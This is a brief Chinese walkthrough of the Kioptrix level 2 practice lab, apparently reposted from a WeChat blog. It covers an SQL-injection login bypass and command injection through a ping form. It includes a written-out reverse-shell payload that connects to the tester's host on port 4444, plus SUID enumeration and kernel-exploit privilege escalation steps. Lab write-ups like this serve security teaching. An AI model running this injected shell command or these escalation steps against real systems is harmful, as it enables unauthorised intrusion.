Kioprtix level 2靶场
目标ip为192.168.77.133
敏感端口为22 80 3306
先查看web页面,是一个登录页面
弱口令 or sql注入?
通过测试发现,存在万能密码
rce
登录后发现,存在ping,那么通过拼接是可以执行命令的
尝试获取shell
127.0.0.1|bash -c 'exec bash -i &>/dev/tcp/192.168.77.169/4444 <&1'
提权
find / -perm -u=s -type f 2>/dev/null
使用ping提权,会断开连接
尝试使用脚本
下载地址:https://github.com/rebootuser/LinEnum
运行:./LinEnum.sh
下载地址:https://github.com/mzet-/linux-exploit-suggester
运行:./linux-exploit-suggester.sh
第一个脚本运行后,没发现高亮的内容
第二个脚本,运行失败
在之前的操作中,发现机器可以上网,且没有apt命令,猜测不是debian或ubuntu系统,于是查看系统信息
centos 4.5,大概率存在内核漏洞
刚好第二个符合版本要求
直接getshell,起飞
原文始发于微信公众号(轩公子谈技术):Kioprtix level 2靶场记录
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论